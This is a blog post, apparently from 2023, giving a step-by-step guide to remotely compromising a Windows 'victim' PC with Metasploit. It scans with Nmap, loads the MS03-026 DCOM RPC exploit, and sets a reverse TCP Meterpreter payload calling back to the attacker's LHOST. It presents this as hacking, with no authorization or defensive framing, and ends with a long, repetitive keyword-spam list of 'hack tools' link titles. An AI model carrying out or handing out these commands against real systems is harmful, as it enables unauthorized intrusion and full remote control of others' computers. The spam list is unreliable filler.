Friday, June 2, 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

Continue reading


  1. Hacker Tools Linux
  2. Hack Rom Tools
  3. Pentest Tools Nmap
  4. New Hack Tools
  5. Hack Rom Tools
  6. Hacker Tools Software
  7. How To Make Hacking Tools
  8. Hacking Tools For Windows 7
  9. Pentest Tools For Ubuntu
  10. Hacker Hardware Tools
  11. Hacking Tools Hardware
  12. Pentest Tools Github
  13. Pentest Tools Open Source
  14. Hacking Tools For Windows 7
  15. Pentest Tools Website
  16. Pentest Tools Framework
  17. Pentest Tools Review
  18. Pentest Tools Open Source
  19. Hack Tools For Windows
  20. Pentest Tools Subdomain
  21. Hacker Tools
  22. Hacking Tools For Mac
  23. Hacker Security Tools
  24. Pentest Tools Bluekeep
  25. Hacking Tools Pc
  26. Pentest Box Tools Download
  27. Hacks And Tools
  28. Hacker Tools 2019
  29. Hacker
  30. Hack Tools For Ubuntu
  31. Pentest Tools Windows
  32. Hack Tools
  33. Free Pentest Tools For Windows
  34. Hack Website Online Tool
  35. Hack Tools Github
  36. Game Hacking
  37. Hacker Tools 2019
  38. Pentest Tools
  39. Hack Tools
  40. Hacker Tools Hardware
  41. Hacking Tools For Mac
  42. Hacker Tools Mac
  43. What Is Hacking Tools
  44. Pentest Tools Apk
  45. Hacker Tools Linux
  46. Computer Hacker
  47. Hacking Tools For Games
  48. Pentest Automation Tools
  49. Hacking Tools For Windows Free Download
  50. Hacker Tools Hardware
  51. Game Hacking
  52. Hacker Security Tools
  53. Bluetooth Hacking Tools Kali
  54. Pentest Tools Apk
  55. What Is Hacking Tools
  56. Hacker Hardware Tools
  57. Hacking Tools Mac
  58. Growth Hacker Tools
  59. Wifi Hacker Tools For Windows
  60. Hacker Search Tools
  61. Hack Tools 2019
  62. Blackhat Hacker Tools
  63. Hacker Tools Online
  64. Hacks And Tools
  65. Hacking Tools Software
  66. Hack Tools 2019
  67. Pentest Tools Bluekeep
  68. How To Make Hacking Tools
  69. Hacking Tools For Mac
  70. Hacker
  71. Bluetooth Hacking Tools Kali
  72. Pentest Tools Download
  73. Nsa Hack Tools Download
  74. Hack Tools Download
  75. Pentest Tools For Android
  76. Nsa Hacker Tools
  77. Hacker Hardware Tools
  78. Best Hacking Tools 2019
  79. Hacking Tools For Windows Free Download
  80. Computer Hacker
  81. How To Hack
  82. Hacker Tools Mac
  83. Hacking Tools Kit
  84. Hacks And Tools
  85. Install Pentest Tools Ubuntu
  86. Growth Hacker Tools
  87. Pentest Recon Tools
  88. Hacker Tools Free
  89. Hack Tools Github
  90. Pentest Tools Open Source
  91. Hack Tools
  92. Kik Hack Tools
  93. Hacker Tools
  94. Best Pentesting Tools 2018
  95. Pentest Tools Kali Linux
  96. Hack App
  97. Growth Hacker Tools
  98. Nsa Hack Tools Download
  99. Underground Hacker Sites
  100. Pentest Tools Website Vulnerability
  101. Kik Hack Tools
  102. Hacker Tools Software
  103. Pentest Tools Windows
  104. Hacking Tools For Kali Linux
  105. Hacking Tools And Software
  106. Hacking Tools
  107. Hackrf Tools
  108. Nsa Hack Tools
  109. What Are Hacking Tools
  110. Hacker Tools List
  111. Pentest Box Tools Download
  112. Hacking Tools Mac
  113. Pentest Tools For Android
  114. Hack Tools For Pc
  115. Pentest Recon Tools
  116. Hacking Tools Kit
  117. Hack Tools
  118. Hacking Tools Download
  119. Hacking Tools 2019
  120. Hacking Tools For Windows
  121. Hacker Techniques Tools And Incident Handling
  122. Wifi Hacker Tools For Windows
  123. Hack Tools For Mac
  124. Hack Tools For Windows
  125. Pentest Tools
  126. Install Pentest Tools Ubuntu
  127. Pentest Tools
  128. Black Hat Hacker Tools
  129. Hacking Tools Name
  130. Pentest Automation Tools
  131. Nsa Hack Tools
  132. Pentest Tools Open Source
  133. Android Hack Tools Github
  134. Hack Tools Pc
  135. Pentest Tools Review
  136. Pentest Tools Alternative
  137. Pentest Tools List
  138. Hack Tools
  139. Hack Tools
  140. Tools 4 Hack
  141. Hacking Tools Github
  142. Hacker Search Tools
  143. How To Hack
  144. Hacker Hardware Tools
  145. Pentest Tools Subdomain
  146. Pentest Tools Review
  147. Pentest Tools Port Scanner
  148. Hacker Tools For Ios
  149. Hack Tools For Ubuntu
  150. Pentest Tools Online
  151. Pentest Tools Url Fuzzer
  152. What Is Hacking Tools
  153. Hacker Tools For Pc
  154. Hacker Tools Software
  155. Hack Tools For Windows
  156. Best Hacking Tools 2020
  157. World No 1 Hacker Software
  158. Hacker Tools Apk

No comments: